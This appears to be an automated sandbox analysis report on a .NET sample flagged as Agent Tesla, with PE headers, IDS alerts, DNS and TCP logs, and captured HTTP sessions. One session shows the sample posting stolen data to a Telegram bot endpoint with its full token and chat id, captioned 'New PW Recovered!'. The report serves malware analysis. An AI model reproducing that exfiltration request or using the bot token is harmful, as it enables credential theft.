Time Stamp:0x6417FB9C [Mon Mar 20 06:22:20 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1bed10 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1c0000 | 0x600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1c2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1bcd64 | 0x1bce00 | False | 0.47694610055493114 | data | 5.284655743128345 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x1c0000 | 0x600 | 0x600 | False | 0.396484375 | data | 4.512370172683154 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1c2000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x1c00a0 | 0x2d4 | data | |
RT_MANIFEST | 0x1c0374 | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/20/23-18:32:31.325548 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49697 | 443 | 192.168.2.4 | 149.154.167.220
03/20/23-18:33:56.107393 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49700 | 443 | 192.168.2.4 | 149.154.167.220
03/20/23-18:34:27.218517 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49702 | 443 | 192.168.2.4 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 18:32:24.586592913 CET | 49696 | 443 | 192.168.2.4 | 64.185.227.155
Mar 20, 2023 18:32:24.586646080 CET | 443 | 49696 | 64.185.227.155 | 192.168.2.4
Mar 20, 2023 18:32:24.586761951 CET | 49696 | 443 | 192.168.2.4 | 64.185.227.155
Mar 20, 2023 18:32:24.623629093 CET | 49696 | 443 | 192.168.2.4 | 64.185.227.155
Mar 20, 2023 18:32:24.623670101 CET | 443 | 49696 | 64.185.227.155 | 192.168.2.4
Mar 20, 2023 18:32:25.091773033 CET | 443 | 49696 | 64.185.227.155 | 192.168.2.4
Mar 20, 2023 18:32:25.091881990 CET | 49696 | 443 | 192.168.2.4 | 64.185.227.155
Mar 20, 2023 18:32:25.099304914 CET | 49696 | 443 | 192.168.2.4 | 64.185.227.155
Mar 20, 2023 18:32:25.099378109 CET | 443 | 49696 | 64.185.227.155 | 192.168.2.4
Mar 20, 2023 18:32:25.100016117 CET | 443 | 49696 | 64.185.227.155 | 192.168.2.4
Mar 20, 2023 18:32:25.231842041 CET | 49696 | 443 | 192.168.2.4 | 64.185.227.155
Mar 20, 2023 18:32:25.326313019 CET | 49696 | 443 | 192.168.2.4 | 64.185.227.155
Mar 20, 2023 18:32:25.326375008 CET | 443 | 49696 | 64.185.227.155 | 192.168.2.4
Mar 20, 2023 18:32:25.446140051 CET | 443 | 49696 | 64.185.227.155 | 192.168.2.4
Mar 20, 2023 18:32:25.456480026 CET | 443 | 49696 | 64.185.227.155 | 192.168.2.4
Mar 20, 2023 18:32:25.457225084 CET | 49696 | 443 | 192.168.2.4 | 64.185.227.155
Mar 20, 2023 18:32:25.458198071 CET | 49696 | 443 | 192.168.2.4 | 64.185.227.155
Mar 20, 2023 18:32:31.124561071 CET | 49697 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:32:31.124613047 CET | 443 | 49697 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:32:31.124871969 CET | 49697 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:32:31.126873970 CET | 49697 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:32:31.126895905 CET | 443 | 49697 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:32:31.200465918 CET | 443 | 49697 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:32:31.200575113 CET | 49697 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:32:31.220474005 CET | 49697 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:32:31.220511913 CET | 443 | 49697 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:32:31.221143007 CET | 443 | 49697 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:32:31.291834116 CET | 49697 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:32:31.291891098 CET | 443 | 49697 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:32:31.320727110 CET | 443 | 49697 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:32:31.325416088 CET | 49697 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:32:31.325442076 CET | 443 | 49697 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:32:31.474632025 CET | 443 | 49697 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:32:31.474781990 CET | 443 | 49697 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:32:31.475228071 CET | 49697 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:32:31.484395027 CET | 49697 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:33:25.135878086 CET | 49698 | 443 | 192.168.2.4 | 173.231.16.76
Mar 20, 2023 18:33:25.135925055 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.4
Mar 20, 2023 18:33:25.136147976 CET | 49698 | 443 | 192.168.2.4 | 173.231.16.76
Mar 20, 2023 18:33:25.157119989 CET | 49698 | 443 | 192.168.2.4 | 173.231.16.76
Mar 20, 2023 18:33:25.157145023 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.4
Mar 20, 2023 18:33:25.863107920 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.4
Mar 20, 2023 18:33:25.863265038 CET | 49698 | 443 | 192.168.2.4 | 173.231.16.76
Mar 20, 2023 18:33:25.865885973 CET | 49698 | 443 | 192.168.2.4 | 173.231.16.76
Mar 20, 2023 18:33:25.865912914 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.4
Mar 20, 2023 18:33:25.866353989 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.4
Mar 20, 2023 18:33:26.049547911 CET | 49698 | 443 | 192.168.2.4 | 173.231.16.76
Mar 20, 2023 18:33:26.188822985 CET | 49698 | 443 | 192.168.2.4 | 173.231.16.76
Mar 20, 2023 18:33:26.188852072 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.4
Mar 20, 2023 18:33:26.346055031 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.4
Mar 20, 2023 18:33:26.346255064 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.4
Mar 20, 2023 18:33:26.346323967 CET | 49698 | 443 | 192.168.2.4 | 173.231.16.76
Mar 20, 2023 18:33:26.347604990 CET | 49698 | 443 | 192.168.2.4 | 173.231.16.76
Mar 20, 2023 18:33:55.989125967 CET | 49700 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:33:55.989182949 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:33:55.989268064 CET | 49700 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:33:55.989737034 CET | 49700 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:33:55.989758015 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:33:56.056571007 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:33:56.056674004 CET | 49700 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:33:56.058507919 CET | 49700 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:33:56.058527946 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:33:56.059144020 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:33:56.061554909 CET | 49700 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:33:56.061579943 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:33:56.107008934 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:33:56.107294083 CET | 49700 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:33:56.107326031 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:33:56.210222006 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:33:56.210357904 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:33:56.210422993 CET | 49700 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:33:56.210705996 CET | 49700 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:34:27.099704981 CET | 49702 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:34:27.099773884 CET | 443 | 49702 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:34:27.099880934 CET | 49702 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:34:27.100567102 CET | 49702 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:34:27.100583076 CET | 443 | 49702 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:34:27.163845062 CET | 443 | 49702 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:34:27.163971901 CET | 49702 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:34:27.166548014 CET | 49702 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:34:27.166579962 CET | 443 | 49702 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:34:27.166970015 CET | 443 | 49702 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:34:27.171504974 CET | 49702 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:34:27.171519995 CET | 443 | 49702 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:34:27.216794014 CET | 443 | 49702 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:34:27.218399048 CET | 49702 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:34:27.218422890 CET | 443 | 49702 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:34:27.370958090 CET | 443 | 49702 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:34:27.371076107 CET | 443 | 49702 | 149.154.167.220 | 192.168.2.4
Mar 20, 2023 18:34:27.371150017 CET | 49702 | 443 | 192.168.2.4 | 149.154.167.220
Mar 20, 2023 18:34:27.371618986 CET | 49702 | 443 | 192.168.2.4 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 18:32:24.526776075 CET | 50911 | 53 | 192.168.2.4 | 8.8.8.8
Mar 20, 2023 18:32:24.546508074 CET | 53 | 50911 | 8.8.8.8 | 192.168.2.4
Mar 20, 2023 18:32:24.555258989 CET | 59683 | 53 | 192.168.2.4 | 8.8.8.8
Mar 20, 2023 18:32:24.577235937 CET | 53 | 59683 | 8.8.8.8 | 192.168.2.4
Mar 20, 2023 18:32:31.103744984 CET | 64167 | 53 | 192.168.2.4 | 8.8.8.8
Mar 20, 2023 18:32:31.121021986 CET | 53 | 64167 | 8.8.8.8 | 192.168.2.4
Mar 20, 2023 18:33:25.043720007 CET | 58565 | 53 | 192.168.2.4 | 8.8.8.8
Mar 20, 2023 18:33:25.061610937 CET | 53 | 58565 | 8.8.8.8 | 192.168.2.4
Mar 20, 2023 18:33:25.073210001 CET | 52239 | 53 | 192.168.2.4 | 8.8.8.8
Mar 20, 2023 18:33:25.091322899 CET | 53 | 52239 | 8.8.8.8 | 192.168.2.4
Mar 20, 2023 18:33:51.773864031 CET | 56807 | 53 | 192.168.2.4 | 8.8.8.8
Mar 20, 2023 18:33:51.793879986 CET | 53 | 56807 | 8.8.8.8 | 192.168.2.4
Mar 20, 2023 18:33:51.806875944 CET | 61007 | 53 | 192.168.2.4 | 8.8.8.8
Mar 20, 2023 18:33:51.824767113 CET | 53 | 61007 | 8.8.8.8 | 192.168.2.4
Mar 20, 2023 18:33:55.968945980 CET | 60686 | 53 | 192.168.2.4 | 8.8.8.8
Mar 20, 2023 18:33:55.986170053 CET | 53 | 60686 | 8.8.8.8 | 192.168.2.4
Mar 20, 2023 18:34:25.351342916 CET | 61124 | 53 | 192.168.2.4 | 8.8.8.8
Mar 20, 2023 18:34:25.371908903 CET | 53 | 61124 | 8.8.8.8 | 192.168.2.4
Mar 20, 2023 18:34:25.376571894 CET | 59444 | 53 | 192.168.2.4 | 8.8.8.8
Mar 20, 2023 18:34:25.396368980 CET | 53 | 59444 | 8.8.8.8 | 192.168.2.4
Mar 20, 2023 18:34:27.075902939 CET | 55570 | 53 | 192.168.2.4 | 8.8.8.8
Mar 20, 2023 18:34:27.093414068 CET | 53 | 55570 | 8.8.8.8 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 20, 2023 18:32:24.526776075 CET | 192.168.2.4 | 8.8.8.8 | 0xb0ff | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:24.555258989 CET | 192.168.2.4 | 8.8.8.8 | 0x4804 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:31.103744984 CET | 192.168.2.4 | 8.8.8.8 | 0x6a9b | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:25.043720007 CET | 192.168.2.4 | 8.8.8.8 | 0x4f01 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:25.073210001 CET | 192.168.2.4 | 8.8.8.8 | 0xb96 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:51.773864031 CET | 192.168.2.4 | 8.8.8.8 | 0xad9b | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:51.806875944 CET | 192.168.2.4 | 8.8.8.8 | 0x2d72 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:55.968945980 CET | 192.168.2.4 | 8.8.8.8 | 0x607a | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:34:25.351342916 CET | 192.168.2.4 | 8.8.8.8 | 0xc1c3 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:34:25.376571894 CET | 192.168.2.4 | 8.8.8.8 | 0xe942 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:34:27.075902939 CET | 192.168.2.4 | 8.8.8.8 | 0xed0e | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 18:32:24.546508074 CET | 8.8.8.8 | 192.168.2.4 | 0xb0ff | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:32:24.546508074 CET | 8.8.8.8 | 192.168.2.4 | 0xb0ff | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:24.546508074 CET | 8.8.8.8 | 192.168.2.4 | 0xb0ff | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:24.546508074 CET | 8.8.8.8 | 192.168.2.4 | 0xb0ff | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:24.577235937 CET | 8.8.8.8 | 192.168.2.4 | 0x4804 | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:32:24.577235937 CET | 8.8.8.8 | 192.168.2.4 | 0x4804 | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:24.577235937 CET | 8.8.8.8 | 192.168.2.4 | 0x4804 | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:24.577235937 CET | 8.8.8.8 | 192.168.2.4 | 0x4804 | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:31.121021986 CET | 8.8.8.8 | 192.168.2.4 | 0x6a9b | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:25.061610937 CET | 8.8.8.8 | 192.168.2.4 | 0x4f01 | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:33:25.061610937 CET | 8.8.8.8 | 192.168.2.4 | 0x4f01 | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:25.061610937 CET | 8.8.8.8 | 192.168.2.4 | 0x4f01 | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:25.061610937 CET | 8.8.8.8 | 192.168.2.4 | 0x4f01 | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:25.091322899 CET | 8.8.8.8 | 192.168.2.4 | 0xb96 | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:33:25.091322899 CET | 8.8.8.8 | 192.168.2.4 | 0xb96 | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:25.091322899 CET | 8.8.8.8 | 192.168.2.4 | 0xb96 | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:25.091322899 CET | 8.8.8.8 | 192.168.2.4 | 0xb96 | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:51.793879986 CET | 8.8.8.8 | 192.168.2.4 | 0xad9b | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:33:51.793879986 CET | 8.8.8.8 | 192.168.2.4 | 0xad9b | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:51.793879986 CET | 8.8.8.8 | 192.168.2.4 | 0xad9b | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:51.793879986 CET | 8.8.8.8 | 192.168.2.4 | 0xad9b | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:51.824767113 CET | 8.8.8.8 | 192.168.2.4 | 0x2d72 | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:33:51.824767113 CET | 8.8.8.8 | 192.168.2.4 | 0x2d72 | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:51.824767113 CET | 8.8.8.8 | 192.168.2.4 | 0x2d72 | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:51.824767113 CET | 8.8.8.8 | 192.168.2.4 | 0x2d72 | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:55.986170053 CET | 8.8.8.8 | 192.168.2.4 | 0x607a | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:34:25.371908903 CET | 8.8.8.8 | 192.168.2.4 | 0xc1c3 | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:34:25.371908903 CET | 8.8.8.8 | 192.168.2.4 | 0xc1c3 | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:34:25.371908903 CET | 8.8.8.8 | 192.168.2.4 | 0xc1c3 | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:34:25.371908903 CET | 8.8.8.8 | 192.168.2.4 | 0xc1c3 | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:34:25.396368980 CET | 8.8.8.8 | 192.168.2.4 | 0xe942 | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:34:25.396368980 CET | 8.8.8.8 | 192.168.2.4 | 0xe942 | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:34:25.396368980 CET | 8.8.8.8 | 192.168.2.4 | 0xe942 | No error (0) | api4.ipify.org | - | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:34:25.396368980 CET | 8.8.8.8 | 192.168.2.4 | 0xe942 | No error (0) | api4.ipify.org | - | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:34:27.093414068 CET | 8.8.8.8 | 192.168.2.4 | 0xed0e | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                      • api.ipify.org
                                                                                      • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49696 | 64.185.227.155 | 443 | C:\Users\user\Desktop\PSFBGrvmxy.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 17:32:25 UTC | 0 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2023-03-20 17:32:25 UTC | 0 | IN | HTTP/1.1 200 OK
Content-Length: 14
Content-Type: text/plain
Date: Mon, 20 Mar 2023 17:32:25 GMT
Vary: Origin
Connection: close
2023-03-20 17:32:25 UTC | 0 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
Data Ascii: 102.129.143.78


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49697 | 149.154.167.220 | 443 | C:\Users\user\Desktop\PSFBGrvmxy.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 17:32:31 UTC | 0 | OUT | POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8db29b7328c749b
Host: api.telegram.org
Content-Length: 972
Expect: 100-continue
Connection: Keep-Alive
2023-03-20 17:32:31 UTC | 0 | IN | HTTP/1.1 100 Continue
2023-03-20 17:32:31 UTC | 0 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 62 37 33 32 38 63 37 34 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 62 37 33 32 38 63 37 34 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 31 2f 32 30 32 33 20 30 32 3a 35 31 3a 34 30 0a 55 73 65 72
Data Ascii: -----------------------------8db29b7328c749bContent-Disposition: form-data; name="chat_id"6169364705-----------------------------8db29b7328c749bContent-Disposition: form-data; name="caption"New PW Recovered!Time: 03/21/2023 02:51:40User
2023-03-20 17:32:31 UTC | 1 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 20 Mar 2023 17:32:31 GMT
Content-Type: application/json
Content-Length: 727
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
